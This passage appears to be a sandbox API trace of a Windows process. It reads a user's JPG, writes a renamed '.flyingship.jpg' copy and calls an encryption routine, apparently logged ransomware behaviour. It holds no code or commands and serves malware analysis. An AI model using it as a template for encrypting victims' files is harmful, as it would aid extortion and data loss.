0x11 [0189.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0189.006] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0189.006] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.006] CryptDestroyHash (hHash=0x90af58) returned 1 [0189.006] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0189.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0189.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.006] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\8tj3gtlol3fhi5e.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.008] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.008] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0189.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0189.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.008] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0189.008] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0189.008] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0189.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0189.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0189.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0189.010] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat")) returned 0x10 [0189.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0189.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0189.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0189.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0189.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.flyingship.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\8tj3gtlol3fhi5e.flyingship.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0189.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0189.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0189.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0189.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.014] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0189.014] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0189.014] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0189.014] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0189.015] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0189.015] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xb9d1, lpOverlapped=0x0) returned 1 [0189.019] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0189.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0189.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb9d1) returned 0xbea018 [0189.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0189.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0189.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb9d1) returned 0xbf59f8 [0189.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.021] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0189.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb9d1) returned 0xbea018 [0189.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0189.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.022] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0189.022] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0189.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.022] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0189.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb9d1) returned 0xbea018 [0189.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb9d1) returned 0xc013d8 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0189.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0189.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.025] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0189.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0189.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0189.025] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, 